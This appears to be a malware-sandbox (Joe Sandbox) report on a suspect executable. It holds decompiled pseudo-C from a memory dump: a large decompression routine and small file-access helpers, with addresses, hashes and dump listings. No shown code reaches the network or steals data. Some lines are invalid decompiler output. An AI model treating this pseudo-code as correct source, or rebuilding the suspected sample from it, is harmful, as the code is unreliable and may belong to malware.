														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                      0x00000000
                      0x00406355
                      0x00406355
                      0x00406359
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x00406364
                      0x00406371
                      0x00406374
                      0x004066b8
                      0x004066b8
                      0x004066bb
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x004066b8
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                      • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                      • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                      • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040575C, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 68%
                      			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                      0x00405760
                      0x0040576d
                      0x00405782
                      0x00405788

                      APIs
                      • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\nji3Lg1ot6.exe,80000000,00000003), ref: 00405760
                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$AttributesCreate
                      • String ID:
                      • API String ID: 415043291-0
                      • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                      • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                      • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                      • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040573D, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                      0x00405741
                      0x0040574a
                      0x00000000
                      0x00405753
                      0x00405759

                      APIs
                      • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                      • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                      • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                      • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004031A8, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                      0x004031ac
                      0x004031bf
                      0x004031c7
                      0x00000000
                      0x004031ce
                      0x00000000
                      0x004031d0

                      APIs
                      • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                      • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                      • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                      • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004031DA, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                      0x004031e8
                      0x004031ee

                      APIs
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
